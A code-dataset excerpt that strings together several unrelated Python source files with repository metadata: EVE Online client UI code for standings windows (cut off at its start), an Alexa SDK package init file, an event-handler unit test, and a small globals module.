= ('', 0.0) char = sm.GetService('godma').GetItem(eve.session.charid) if util.IsCorporation(fromID): fromFactionID = sm.GetService('faction').GetFaction(fromID) elif util.IsFaction(fromID): fromFactionID = fromID else: agent = sm.GetService('agents').GetAgentByID(fromID) if agent is None: fromFactionID = None else: fromFactionID = agent.factionID for skillTypeID in (const.typeDiplomacy, const.typeConnections, const.typeCriminalConnections): skill = char.skills.get(skillTypeID, None) if skill is not None: relevantSkills[skillTypeID] = skill.skillLevel bonusType, bonus = standingUtil.GetStandingBonus(standing, fromFactionID, relevantSkills) if bonusType is None or bonus <= 0.0: bonus = '' else: effective = (1.0 - (1.0 - standing / 10.0) * (1.0 - bonus / 10.0)) * 10.0 bonusString = localization.GetByLabel('UI/Common/Unknown') if bonusType == const.typeDiplomacy: bonusString = localization.GetByLabel('UI/Standings/Common/DiplomacySkill', value=relevantSkills[bonusType]) elif bonusType == const.typeConnections: bonusString = localization.GetByLabel('UI/Standings/Common/ConnectionsSkill', value=relevantSkills[bonusType]) elif bonusType == const.typeCriminalConnections: bonusString = localization.GetByLabel('UI/Standings/Common/CriminalConnectionsSkill', value=relevantSkills[bonusType]) bonus = localization.GetByLabel('UI/Standings/Common/BonusAdded', bonus=bonusString, value=standing) standing = effective ownerinfo = cfg.eveowners.Get(ownerID) data = {} if label is None: label = ownerinfo.name if standing == 0.0: col = '<color=grey>' else: col = '' data['label'] = localization.GetByLabel('UI/Standings/StandingEntry', color=col, label=label, standing=standing, bonus=bonus, standingText=uix.GetStanding(round(standing, 0), 1)) data['ownerInfo'] = ownerinfo data['fromID'] = fromID data['toID'] = toID data['effective'] = standing return listentry.Get('StandingEntry', data) def GetStandingRelationshipEntries(self, whoID): fromFactionID = sm.GetService('faction').GetFaction(eve.session.corpid) fromCorpID = eve.session.corpid fromCharID = eve.session.charid toAllianceID = None if util.IsFaction(whoID): toFactionID = whoID toCorpID = None toCharID = None elif util.IsCorporation(whoID): toFactionID = sm.GetService('faction').GetFaction(whoID) toCorpID = whoID toCharID = None if not util.IsNPC(whoID): toAllianceID = sm.GetService('corp').GetCorporation(whoID).allianceID elif util.IsAlliance(whoID): toFactionID = None toCorpID = None toCharID = None toAllianceID = whoID elif util.IsNPC(whoID) and sm.GetService('agents').GetAgentByID(whoID): agent = sm.GetService('agents').GetAgentByID(whoID) toFactionID = agent.factionID toCorpID = agent.corporationID toCharID = whoID else: pubinfo = sm.RemoteSvc('charMgr').GetPublicInfo(whoID) toFactionID = sm.GetService('faction').GetFaction(pubinfo.corporationID) if not util.IsNPC(pubinfo.corporationID): toAllianceID = sm.GetService('corp').GetCorporation(pubinfo.corporationID).allianceID toCorpID = pubinfo.corporationID toCharID = whoID @util.Memoized def GetStanding(fromID, toID): return self.GetStanding(fromID, toID) def BogusStanding(fromID, toID): return None in (fromID, toID) or GetStanding(fromID, toID) is None standings = [ (fromID, toID, GetStanding(fromID, toID)) for fromID in [fromFactionID, fromCorpID, fromCharID] for toID in [toFactionID, toCorpID, toCharID, toAllianceID] if not BogusStanding(fromID, toID) ] if eve.session.allianceid is not None: remoteRels = sm.GetService('addressbook').GetContacts().allianceContacts for otherID in (toCorpID, toAllianceID): if otherID is not None and otherID in remoteRels: standing = remoteRels[otherID].relationshipID standings.append((eve.session.allianceid, otherID, standing)) def GetEntry(fromID, toID, standing): return self.GetStandingEntry(toID, fromID, toID, standing, label='%s &gt; %s' % (cfg.eveowners.Get(fromID).name, cfg.eveowners.Get(toID).name)) scrolllist = [] if not util.IsNPC(whoID): scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Standings/InfoWindow/YourStandings')})) scrolllist.extend(starmap(GetEntry, standings)) nonNeutralStandings = [ standing for blah, blah, standing in standings if standing != 0.0 ] if nonNeutralStandings: highest = max(nonNeutralStandings) data = util.KeyVal() data.line = 1 data.indent = 36 data.text = localization.GetByLabel('UI/Standings/Common/DerivedStanding', highest=highest, standing=uix.GetStanding(round(highest, 0), 1)) scrolllist.append(listentry.Get('Divider')) scrolllist.append(listentry.Get('Text', data=data)) scrolllist.append(listentry.Get('Divider')) else: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Standings/InfoWindow/StandingsWithYou')})) scrolllist.extend([ GetEntry(fromID, toID, self.GetStanding(fromID, toID)) for fromID in (toFactionID, toCorpID, toCharID) for toID in (fromFactionID, fromCorpID, fromCharID) if None not in (fromID, toID) and self.GetStanding(fromID, toID) is not None ]) if util.IsFaction(whoID): scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Standings/InfoWindow/StandingsOtherEmpires')})) factions = cfg.factions for faction in factions: if faction.factionID not in (whoID, const.factionUnknown): toInfo = cfg.eveowners.Get(faction.factionID) fromName = cfg.eveowners.Get(whoID).name toName = cfg.eveowners.Get(faction.factionID).name fromStanding = self.GetStanding(whoID, faction.factionID) fromStandingText = uix.GetStanding(round(fromStanding, 0), 1) toStanding = self.GetStanding(faction.factionID, whoID) toStandingText = uix.GetStanding(round(toStanding, 0), 1) fromText = localization.GetByLabel('UI/Standings/StandingRelationshipText', leftSide=fromName, rightSide=toName, standing=fromStanding, standingText=fromStandingText) toText = localization.GetByLabel('UI/Standings/StandingRelationshipText', leftSide=toName, rightSide=fromName, standing=toStanding, standingText=toStandingText) data = util.KeyVal() data.toInfo = toInfo data.label = fromText data.otherlabel = toText scrolllist.append(listentry.Get('FactionStandingEntry', data=data)) return scrolllist def GetStandingEntries(self, positive, whoID, exclude = {}, emptyMessage = 1): self.__Init() if whoID is None: whoID = eve.session.charid corpIDs = [] standings = [] if whoID == session.corpid: for npcID in self.npccorpstandings: if util.IsCorporation(npcID): corpIDs.append(npcID) standings.append((npcID, self.npccorpstandings[npcID].standing)) if whoID == eve.session.charid: for npcID in self.npccharstandings: standings.append((npcID, self.npccharstandings[npcID].standing)) prime = [] for each in standings: if each[0] not in cfg.eveowners: prime.append(each[0]) if prime: self.LogError("Remote standings query didn't return required owner info: ", prime) cfg.eveowners.Prime(prime) cfg.corptickernames.Prime(corpIDs) scrolllist = [] factions = [] alliances = [] corps = [] chars = [] agents = [] for each in standings: standing = each[1] ownerID = each[0] if ownerID not in exclude: fromID = ownerID toID = whoID ownerinfo = cfg.eveowners.Get(ownerID) entry = (round(standing, 2), ownerinfo.name, self.GetStandingEntry(ownerID, fromID, toID, standing)) standing = entry[2].effective if positive and standing < 0.01 or not positive and standing > -0.01: continue if ownerinfo.groupID == const.groupFaction: factions.append(entry) elif ownerinfo.groupID == const.groupCorporation: corps.append(entry) elif util.IsNPC(ownerID): agents.append(entry) def NegSortFunc(x, y): if x[0] < y[0]: return -1 if x[0] > y[0]: return 1 if x[1].lower() < y[1].lower(): return -1 if x[1].lower() > y[1].lower(): return 1 return 0 def PosSortFunc(x, y): if x[0] > y[0]: return -1 if x[0] < y[0]: return 1 if x[1].lower() < y[1].lower(): return -1 if x[1].lower() > y[1].lower(): return 1 return 0 if positive: SortFunc = PosSortFunc else: SortFunc = NegSortFunc factions.sort(SortFunc) alliances.sort(SortFunc) corps.sort(SortFunc) chars.sort(SortFunc) agents.sort(SortFunc) if factions: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Factions')})) for each in factions: scrolllist.append(each[2]) if alliances: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Alliances')})) for each in alliances: scrolllist.append(each[2]) if corps: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Corporations')})) for each in corps: scrolllist.append(each[2]) if chars: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Characters')})) for each in chars: scrolllist.append(each[2]) if agents: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Agents')})) for each in agents: scrolllist.append(each[2]) if emptyMessage and not (factions or corps or chars or agents or alliances): text = '' name = cfg.eveowners.Get(whoID).name if whoID == session.charid: if positive: text = localization.GetByLabel('UI/Standings/Common/EverybodyNegativeYou') else: text = localization.GetByLabel('UI/Standings/Common/EverybodyPositiveYou') elif positive: if util.IsCharacter(whoID): text = localization.GetByLabel('UI/Standings/Common/EverybodyNegativeCharacter', id=whoID) else: text = localization.GetByLabel('UI/Standings/Common/EverybodyNegativeName', name=cfg.eveowners.Get(whoID).name) elif util.IsCharacter(whoID): text = localization.GetByLabel('UI/Standings/Common/EverybodyPositiveCharacter', id=whoID) else: text = localization.GetByLabel('UI/Standings/Common/EverybodyPositiveName', name=cfg.eveowners.Get(whoID).name) scrolllist.append(listentry.Get('Text', {'line': 1, 'text': text})) return scrolllist def GetTransactionWnd(self, fromID, toID = None): self.__Init() if fromID != toID: wnd = form.StandingTransactionsWnd.Open() wnd.Load(fromID, toID, 1, onPage=0) def GetCompositionWnd(self, fromID, toID): self.__Init() wnd = form.StandingCompositionsWnd.Open() wnd.Load(fromID, toID, purge=1) class StandingTransactionsWnd(uicls.Window): __guid__ = 'form.StandingTransactionsWnd' default_windowID = 'standingtransactions' def ApplyAttributes(self, attributes): uicls.Window.ApplyAttributes(self, attributes) self.scope = 'station_inflight' self.SetWndIcon() self.SetTopparentHeight(0) self.SetCaption(localization.GetByLabel('UI/Standings/TransactionWindow/WindowTitle')) self.SetMinSize([342, 256]) self.sr.scroll = uicls.Scroll(name='standingsTransactions', parent=self.sr.main, padding=(const.defaultPadding, const.defaultPadding, const.defaultPadding, const.defaultPadding)) self.sr.scroll.sr.id = 'standingsTransactions' eventTypes = [[localization.GetByLabel('UI/Common/All'), None]] + util.GetStandingEventTypes() browserParent = uicls.Container(name='browser', parent=self.sr.main, idx=0, align=uiconst.TOTOP, height=36) sidepar = uicls.Container(name='sidepar', parent=browserParent, align=uiconst.TORIGHT, width=54) btn = uix.GetBigButton(24, sidepar, 0, 12) btn.OnClick = (self.Browse, -1) btn.hint = localization.GetByLabel('UI/Common/Previous') btn.sr.icon.LoadIcon('ui_23_64_1') btn.state = uiconst.UI_HIDDEN self.sr.backBtn = btn btn = uix.GetBigButton(24, sidepar, 24, 12) btn.OnClick = (self.Browse, 1) btn.hint = localization.GetByLabel('UI/Common/ViewMore') btn.sr.icon.LoadIcon('ui_23_64_2') self.sr.fwdBtn = btn self.page = 0 inpt = uicls.SinglelineEdit(name='fromdate', parent=browserParent, setvalue=self.GetNow(), align=uiconst.TOPLEFT, pos=(8, 16, 92, 0), maxLength=16) uicls.EveLabelSmall(text=localization.GetByLabel('UI/Common/Date'), parent=inpt, width=200, top=-12) inpt.OnReturn = self.OnReturn self.sr.fromdate = inpt i = 0 for optlist, label, config, defval in [(eventTypes, localization.GetByLabel('UI/Standings/TransactionWindow/EventType'), 'eventType', localization.GetByLabel('UI/Common/All'))]: combo = uicls.Combo(label=label, parent=browserParent, options=optlist, name=config, select=settings.user.ui.Get(config, defval), callback=self.OnComboChange, pos=(inpt.left + inpt.width + 6 + i * 92, inpt.top, 0, 0), width=86, align=uiconst.TOPLEFT) self.sr.Set(label.replace(' ', '') + 'Combo', combo) i += 1 def OnComboChange(self, entry, header, value, *args): if self.sr.Get('data'): if entry.name == 'eventType': self.sr.data[4] = value self.sr.data[0] = None self.page = 0 uthread.pool('standing::OnComboChange', self.Load, self.sr.data[1], self.sr.data[2]) def OnReturn(self, *args): if self.sr.Get('data'): self.sr.data[5] = util.ParseDate(self.sr.fromdate.GetValue()) self.sr.data[0] = None uthread.pool('standing::OnReturn', self.Load, self.sr.data[1], self.sr.data[2]) def Browse(self, direction, *args): if self.sr.Get('data') and self.sr.data[3]: if direction > 0: eventID = None for each in self.sr.data[3]: eventID = each.eventID self.sr.data[5] = None self.sr.data[6] = 0 else: eventID = self.sr.data[0] self.sr.data[5] = None self.sr.data[6] = 1 self.sr.data[0] = eventID self.page += direction uthread.pool('standing::Browse', self.Load, self.sr.data[1], self.sr.data[2]) def GetNow(self): return util.FmtDate(blue.os.GetWallclockTime(), 'sn') def Load(self, fromID, toID, purge = 0, onPage = None): if getattr(self, 'loading', 0): return self.loading = 1 if onPage is not None: self.page = onPage try: self.sr.scroll.Clear() if fromID and toID: if util.IsCharacter(fromID) and util.IsCharacter(toID): standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToCharacter', fromID=fromID, toID=toID) elif util.IsCharacter(fromID): standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToCorp', fromID=fromID, toName=cfg.eveowners.Get(toID).name) elif util.IsCharacter(toID): standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToCharacter', fromName=cfg.eveowners.Get(fromID).name, toID=toID) else: standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToCorp', fromName=cfg.eveowners.Get(fromID).name, toName=cfg.eveowners.Get(toID).name) elif fromID: if util.IsCharacter(fromID): standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToAny', fromID=fromID) else: standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToAny', fromName=cfg.eveowners.Get(fromID).name) elif util.IsCharacter(toID): standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromAnyToCharacter', toID=toID) else: standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromAnyToCorp', toName=cfg.eveowners.Get(toID).name) self.SetCaption(standing) scrolllist = [] if not self.sr.Get('data') or purge: self.sr.data = [None, None, None, [], None, None, 1] eventType = self.sr.data[4] eventID = self.sr.data[0] eventDateTime = self.sr.data[5] direction = self.sr.data[6] if eventDateTime is not None: if direction == 1: eventDateTime += HOUR * 23 + MIN * 59 + SEC * 59 data = sm.RemoteSvc('standing2').GetStandingTransactions(fromID, toID, direction, eventID, eventType, eventDateTime) self.sr.data = [eventID, fromID, toID, data, eventType, eventDateTime, direction] if self.page > 0: self.sr.backBtn.state = uiconst.UI_NORMAL else: self.sr.backBtn.state = uiconst.UI_HIDDEN if self.sr.data[3]: self.sr.data[0] = self.sr.data[3][0].eventID if len(self.sr.data[3]) < 25: self.sr.fwdBtn.state = uiconst.UI_HIDDEN else: self.sr.fwdBtn.state = uiconst.UI_NORMAL else: self.sr.fwdBtn.state = uiconst.UI_HIDDEN if self.sr.data[3]: for each in self.sr.data[3]: isNPC = False subject, body = util.FmtStandingTransaction(each) when = util.FmtDate(each.eventDateTime, 'ls') mod = '%-2.4f' % (each.modification * 100.0) while mod and mod[-1] == '0': if mod[-2:] == '.0': break mod = mod[:-1] if fromID is None: extraFrom = cfg.eveowners.Get(each.fromID).name + '<t>' else: if util.IsNPC(fromID): isNPC = True extraFrom = '' if toID is None: extraTo = cfg.eveowners.Get(each.toID).name + '<t>' else: extraTo = '' text = '%s<t>%s<t>%s%s%s %%<t>%s' % (each.eventID, when, extraFrom, extraTo, mod, subject) scrolllist.append(listentry.Get('StandingTransaction', {'line': 1, 'text': text, 'details': body, 'sort_%s' % localization.GetByLabel('UI/Common/Value'): float(mod), 'isNPC': isNPC})) else: scrolllist.append(listentry.Get('Text', {'line': 1, 'text': localization.GetByLabel('UI/Standings/TransactionWindow/NoTransactions')})) h = [localization.GetByLabel('UI/Common/ID'), localization.GetByLabel('UI/Common/Date')] if fromID is None: h += [localization.GetByLabel('UI/Common/From')] if toID is None: h += [localization.GetByLabel('UI/Common/To')] h += [localization.GetByLabel('UI/Common/Value'), localization.GetByLabel('UI/Common/Reason')] self.sr.scroll.Load(fixedEntryHeight=32, contentList=scrolllist, headers=h, reversesort=1, sortby=localization.GetByLabel('UI/Common/ID')) finally: self.loading = 0 class StandingTransaction(listentry.Text): __guid__ = 'listentry.StandingTransaction' __params__ = ['text', 'details'] def Load(self, node): listentry.Text.Load(self, node) self.isNPC = node.isNPC self.sr.details = node.details def GetMenu(self): if self.isNPC: details = self.sr.details return [(uiutil.MenuLabel('UI/Common/Details'), self.ShowTransactionDetails, (details,))] return [] def OnDblClick(self, *args): if self.isNPC: self.ShowTransactionDetails() def ShowTransactionDetails(self, details = None, *args): details = details if details != None else self.sr.details uix.TextBox(localization.GetByLabel('UI/Standings/TransactionWindow/Details'), details) class StandingEntry(uicls.SE_BaseClassCore): __guid__ = 'listentry.StandingEntry' def Startup(self, *etc): self.sr.label = uicls.EveLabelMedium(text='', parent=self, left=36, top=0, state=uiconst.UI_DISABLED, color=None, maxLines=1, align=uiconst.CENTERLEFT) uicls.Line(parent=self, align=uiconst.TOBOTTOM) self.sr.iconParent = uicls.Container(parent=self, left=1, top=0, width=32, height=32, align=uiconst.TOPLEFT, state=uiconst.UI_PICKCHILDREN) self.sr.infoicon = uicls.InfoIcon(size=16, left=0, top=2, parent=self, idx=0, align=uiconst.TOPRIGHT) self.sr.infoicon.OnClick = self.ShowInfo def Load(self, node): self.sr.node = node data = node self.sr.label.text = data.label self.sr.iconParent.Flush() logo = None typeInfo = cfg.invtypes.Get(data.ownerInfo.typeID) iconParams = {'parent': self.sr.iconParent, 'align': uiconst.TOALL, 'state': uiconst.UI_DISABLED, 'idx': 0} if typeInfo.groupID in (const.groupCorporation, const.groupFaction, const.groupAlliance): logo = uiutil.GetLogoIcon(itemID=data.ownerInfo.ownerID, **iconParams) elif typeInfo.groupID == const.groupCharacter: logo = uicls.Icon(icon=None, **iconParams) sm.GetService('photo').GetPortrait(data.ownerInfo.ownerID, 64, logo) self.sr.label.left = 36 def OnDblClick(self, *args): self.ShowTransactions(self.sr.node) def ShowTransactions(self, node): node = node if node != None else self.sr.node sm.GetService('standing').GetTransactionWnd(node.fromID, node.toID) def ShowCompositions(self, node = None): node = node if node != None else self.sr.node sm.GetService('standing').GetCompositionWnd(node.fromID, node.toID) def EditStandings(self, node = None): node = node if node != None else self.sr.node sm.GetService('standing').GetEditWnd(eve.session.charid, node.toID) def ResetStandings(self, node = None): node = node if node != None else self.sr.node if eve.Message('StandingsConfirmReset', {'who': cfg.eveowners.Get(node.toID).name}, uix.YESNO, suppress=uix.ID_YES) == uix.ID_YES: sm.GetService('standing').ResetStandings(eve.session.charid, node.toID) def EditCorpStandings(self, node = None): node = node if node != None else self.sr.node sm.GetService('standing').GetEditWnd(eve.session.corpid, node.toID) def ResetCorpStandings(self, node = None): node = node if node != None else self.sr.node if eve.Message('StandingsConfirmResetCorp', {'who': cfg.eveowners.Get(node.toID).name}, uix.YESNO, suppress=uix.ID_YES) == uix.ID_YES: sm.GetService('standing').ResetStandings(eve.session.corpid, node.toID) def ShowInfo(self, node = None, *args): if self.sr.node.Get('ownerInfo', None): sm.GetService('info').ShowInfo(self.sr.node.ownerInfo.typeID, self.sr.node.ownerInfo.ownerID) def GetMenu(self): m = [] node = self.sr.node addressBookSvc = sm.GetService('addressbook') m.append((uiutil.MenuLabel('UI/Commands/ShowInfo'), self.ShowInfo, (node,))) if self.sr.node.toID != self.sr.node.fromID: if util.IsNPC(self.sr.node.fromID) and self.sr.node.toID == eve.session.corpid: m.append((uiutil.MenuLabel('UI/Commands/ShowCompositions'), self.ShowCompositions, (node,))) elif self.sr.node.fromID in (eve.session.charid, eve.session.corpid) or util.IsNPC(self.sr.node.fromID) and self.sr.node.toID == eve.session.charid: m.append((uiutil.MenuLabel('UI/Commands/ShowTransactions'), self.ShowTransactions, (node,))) if self.sr.node.fromID == eve.session.charid: if self.sr.node.toID != self.sr.node.fromID: if addressBookSvc.IsInAddressBook(self.sr.node.toID, 'contact'): m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/EditContact'), addressBookSvc.AddToPersonalMulti, (self.sr.node.toID, 'contact', True))) m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/RemoveContact'), addressBookSvc.DeleteEntryMulti, ([self.sr.node.toID], 'contact'))) else: m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/AddContact'), addressBookSvc.AddToPersonalMulti, (self.sr.node.toID, 'contact'))) if self.sr.node.fromID == eve.session.corpid and const.corpRoleDirector & eve.session.corprole == const.corpRoleDirector: if self.sr.node.toID != self.sr.node.fromID and not util.IsNPC(self.sr.node.fromID): if addressBookSvc.IsInAddressBook(self.sr.node.toID, 'corpcontact'): m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/EditCorpContact'), addressBookSvc.AddToPersonalMulti, (self.sr.node.toID, 'corpcontact', True))) m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/RemoveCorpContact'), addressBookSvc.DeleteEntryMulti, ([self.sr.node.toID], 'corpcontact'))) else: m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/AddContact'), addressBookSvc.AddToPersonalMulti, (self.sr.node.toID, 'corpcontact'))) return m def GetHeight(self, *args): node, width = args node.height = 32 return node.height class FactionStandingEntry(uicls.SE_BaseClassCore): __guid__ = 'listentry.FactionStandingEntry' def Startup(self, *etc): self.sr.label = uicls.EveLabelMedium(text='', parent=self, left=36, top=0, state=uiconst.UI_DISABLED, maxLines=1, align=uiconst.TOPLEFT) self.sr.otherlabel = uicls.EveLabelMedium(text='', parent=self, left=36, top=0, state=uiconst.UI_DISABLED, maxLines=1, align=uiconst.BOTTOMLEFT) uicls.Line(parent=self, align=uiconst.TOBOTTOM) self.sr.iconParent = uicls.Container(parent=self, pos=(1, 0, 32, 32), align=uiconst.TOPLEFT, state=uiconst.UI_PICKCHILDREN) self.sr.infoicon = uicls.InfoIcon(size=16, left=0, top=2, parent=self, idx=0, align=uiconst.TOPRIGHT) self.sr.infoicon.OnClick = self.ShowInfo def Load(self, node): self.sr.node = node data = node self.sr.label.text = data.label self.sr.otherlabel.text = data.otherlabel toInfo = data.toInfo self.sr.iconParent.Flush() logo = None typeInfo = cfg.invtypes.Get(toInfo.typeID) iconParams = {'parent': self.sr.iconParent, 'align': uiconst.TOALL, 'state': uiconst.UI_DISABLED, 'idx': 0} logo = uiutil.GetLogoIcon(itemID=toInfo.ownerID, **iconParams) self.sr.label.left = 36 def ShowInfo(self, node = None, *args): toInfo = cfg.eveowners.Get(self.sr.node.toInfo) sm.GetService('info').ShowInfo(toInfo.typeID, toInfo.ownerID) def GetHeight(self, *args): node, width = args node.height = 32 return node.height class StandingCompositionsWnd(uicls.Window): __guid__ = 'form.StandingCompositionsWnd' default_windowID = 'standingcompositions' def ApplyAttributes(self, attributes): uicls.Window.ApplyAttributes(self, attributes) self.scope = 'station_inflight' self.SetCaption(localization.GetByLabel('UI/Standings/CompositionWindow/WindowTitle')) self.SetMinSize([342, 256]) self.SetWndIcon() self.SetTopparentHeight(0) self.sr.scroll = uicls.Scroll(parent=self.sr.main, padding=(const.defaultPadding, const.defaultPadding, const.defaultPadding, const.defaultPadding)) textParent = uicls.Container(name='text', parent=self.sr.main, idx=0, align=uiconst.TOTOP, height=72) self.sr.helpNote = uicls.EveLabelMedium(text=localization.GetByLabel('UI/Standings/CompositionWindow/NPCToPlayerCorp'), parent=textParent, align=uiconst.TOTOP, left=6, top=3, state=uiconst.UI_NORMAL) def Load(self, fromID, toID, purge = 0): if getattr(self, 'loading', 0): return self.loading = 1 try: self.sr.scroll.Clear() if util.IsCharacter(fromID) and util.IsCharacter(toID): caption = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToCharacter', fromID=fromID, toID=toID) elif util.IsCharacter(fromID): caption = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToCorp', fromID=fromID, toName=cfg.eveowners.Get(toID).name) elif util.IsCharacter(toID): caption = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToCharacter', fromName=cfg.eveowners.Get(fromID).name, toID=toID) else: caption = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToCorp', fromName=cfg.eveowners.Get(fromID).name, toName=cfg.eveowners.Get(toID).name) self.SetCaption(caption) scrolllist = [] if not self.sr.Get('data') or purge: self.sr.data = sm.RemoteSvc('standing2').GetStandingCompositions(fromID, toID) if self.sr.data: prior = 0.0 for each in self.sr.data: if each.ownerID == fromID: prior = each.standing break scrolllist.append(sm.GetService('standing').GetStandingEntry(fromID, fromID, toID, prior, showBonuses=0, label='Current Value')) for each in self.sr.data: if each.ownerID == fromID: continue charinfo = cfg.eveowners.Get(each.ownerID) scrolllist.append(sm.GetService('standing').GetStandingEntry(each.ownerID, fromID, each.ownerID, each.standing, showBonuses=0)) else: scrolllist.append(listentry.Get('Text', {'line': 1, 'text': localization.GetByLabel('UI/Standings/CompositionWindow/NoInfo')})) self.sr.scroll.Load(contentList=scrolllist) finally: self.loading = 0
d902870ae9a1873fa7213787d5d72768ad6ec3af
dfc61cfb4e6e93c4143250691ff8279790451e59
/ask-sdk-model/ask_sdk_model/interfaces/alexa/presentation/html/__init__.py
e9fd9971909fcd092b9687de32b0104f419ab99b
[ "Apache-2.0" ]
permissive
Shreyas-vgr/alexa-apis-for-python
5c2444238ace749fc89c604e4a194cb0bf31ef78
74ea73b3b6a03fd9cb735fb8c1fb2bd961faab54
refs/heads/master
2020-11-26T04:48:25.302742
2019-12-19T03:35:26
2019-12-19T03:41:40
228,967,736
1
0
Apache-2.0
2019-12-19T03:30:10
2019-12-19T03:30:10
null
UTF-8
Python
false
false
1,091
py
# coding: utf-8 # # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the 'License'). You may not use this file # except in compliance with the License. A copy of the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for # the specific language governing permissions and limitations under the License. # from __future__ import absolute_import from .transformer_type import TransformerType from .handle_message_directive import HandleMessageDirective from .transformer import Transformer from .runtime import Runtime from .start_request_method import StartRequestMethod from .start_request import StartRequest from .message_request import MessageRequest from .configuration import Configuration from .start_directive import StartDirective from .alexa_presentation_html_interface import AlexaPresentationHtmlInterface
e69877e2f09786585a92a0ab3dbd3905b3ce3ce5
cf297c3d66189d2bd9fd8bfdadaeff3ebe6eee05
/WebBrickLibs/EventHandlers/tests/TestUtils.py
156b35af8887add2352285a3dd71cb50154673ab
[ "BSD-3-Clause" ]
permissive
AndyThirtover/wb_gateway
0cb68a1f2caf7f06942f94b867ea02f4f8695492
69f9c870369085f4440033201e2fb263a463a523
refs/heads/master
2022-01-19T00:07:20.456346
2022-01-05T21:08:16
2022-01-05T21:08:16
14,687,973
0
0
null
null
null
null
UTF-8
Python
false
false
3,332
py
# Copyright L.P.Klyne 2013 # Licenced under 3 clause BSD licence # $Id: TestUtils.py 3222 2009-07-14 15:32:00Z simon.hughes $ # # Some test helpers for testing event handlers. Uses a SuperGlobal to save state. # import sys import unittest from EventLib.Event import Event, makeEvent from EventHandlers.Utils import * class TestUtilsUnit(unittest.TestCase): def setUp(self): self._log = logging.getLogger( "TestUtils" ) self._log.debug( "\n\nsetUp" ) def tearDown(self): self._log.debug( "\n\ntearDown" ) # Actual tests follow def testMakeEvent(self): self._log.debug( "\ntestMakeEvent" ) newEvent = makeNewEvent( { 'type':'newtype', 'source':'newsource', 'other_data':{'data':'data','data1':'data1','data2':'data2' }, 'copy_other_data':{'data1':'data1', 'data2':'data2' } }, makeEvent('oldType', 'oldSource', {'data1':'olddata1'} ), {'data2':'xtradata2'} ) self.assertNotEqual( newEvent, None) self.assertEqual( newEvent.getType(), "newtype" ) self.assertEqual( newEvent.getSource(), "newsource" ) od = newEvent.getPayload() self.assertEqual( od['data'], "data" ) self.assertEqual( od['data1'], "olddata1" ) self.assertEqual( od['data2'], "xtradata2" ) def testMakeEventSubsitution(self): self._log.debug( "\ntestMakeEventSubsitution" ) newEvent = makeNewEvent( { 'type':'%(Newtype)s', 'source':'%(Newsource)s', 'other_data':{'data':'data','data1':'TEST%(Subdata)sTEST','data2':'data2' }, }, makeEvent('oldType', 'oldSource', {'data1':'olddata1','Newtype':'SubType','Newsource':'SubSource','Subdata':'SUBBEDDATA'} ), {'data2':'xtradata2'} ) print newEvent self.assertNotEqual( newEvent, None) self.assertEqual( newEvent.getType(), "SubType" ) self.assertEqual( newEvent.getSource(), "SubSource" ) od = newEvent.getPayload() self.assertEqual( od['data'], "data" ) self.assertEqual( od['data1'], "TESTSUBBEDDATATEST" ) def testDummy(self): return from MiscLib import TestUtils def getTestSuite(select="unit"): """ Get test suite select is one of the following: "unit" return suite of unit tests only "component" return suite of unit and component tests "all" return suite of unit, component and integration tests "pending" return suite of pending tests name a single named test to be run """ testdict = { "unit": [ "testMakeEvent", "testMakeEventSubsitution" ], "component": [ "testDummy" ], "integration": [ "testDummy" ], "pending": [ "testDummy" ] } return TestUtils.getTestSuite(TestUtilsUnit, testdict, select=select) # Run unit tests directly from command line if __name__ == "__main__": TestUtils.runTests("TestUtils.log", getTestSuite, sys.argv)
d9b51bdf9583fa308dd667a5782de30b5a4314bc
7d675a20af47cf1d1599610197d90969a8256f5c
/ex0/env.py
e5ad17a21e801289e8dceee375f440ca4133c13d
[]
no_license
QuentinGoss/janar-tapas1
7bddd07c8888291aa28886f66f7b6a29d453893e
c2a1c6de8ffeb8051a2efd1b544fb8f6eac2e804
refs/heads/master
2020-12-26T20:59:06.623246
2020-02-15T01:46:14
2020-02-15T01:46:14
237,640,269
0
0
null
null
null
null
UTF-8
Python
false
false
91
py
# env.py options = None map_dir = None # Vehicles counter = 0 vehicles = [] complete = []
5599614cd850830f9c0dd4726214b6fcd123965e
783bda14ef99024acea3584bc19130375fec2508
/04_02_Start.py
5a73e134a03fdfaf2edc1910586ae2106d72afdf
[]
no_license
liberbell/opendata01
75d4ed22f54fb42112b02244c9bf2cfad08935ca
f1b7c33e6f61d7ca4f01cc96c4ce05c4f6fb78bf
refs/heads/master
2020-03-21T10:25:08.678066
2018-08-21T00:21:09
2018-08-21T00:21:09
138,449,774
0
0
null
null
null
null
UTF-8
Python
false
false
260
py
